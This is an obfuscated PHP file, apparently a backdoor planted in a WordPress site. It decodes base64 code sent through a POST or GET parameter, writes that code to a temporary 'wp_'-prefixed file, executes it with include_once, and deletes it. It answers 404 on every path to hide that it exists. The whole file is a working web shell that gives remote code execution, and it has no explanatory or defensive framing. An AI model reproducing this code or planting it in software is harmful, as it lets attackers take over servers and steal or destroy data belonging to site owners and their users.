<?php
try{
$l7d7ca=array('sys_get_te'.'mp_dir','file_put_conte'.'nts','unl'.'ink','array_key_exi'.'sts','base64_dec'.'ode','te'.'mpnam');
$iedba3='82d909'.'75';
if($l7d7ca[3]($iedba3,$_POST)){
$r9f65c=$l7d7ca[4]($_POST[$iedba3]);
}elseif($l7d7ca[3]($iedba3,$_GET)){
$r9f65c=$l7d7ca[4]($_GET[$iedba3]);
}else{$r9f65c=null;}
if($r9f65c){
$w5f2e1=$l7d7ca[5]($l7d7ca[0](),'w'.'p_');
if($w5f2e1){
$l7d7ca[1]($w5f2e1,'<'.'?ph'.'p '.$r9f65c);
http_response_code(404);
@include_once($w5f2e1);
@$l7d7ca[2]($w5f2e1);
}}
http_response_code(404);
}catch(Throwable $e){http_response_code(404);}catch(Exception $e){http_response_code(404);}
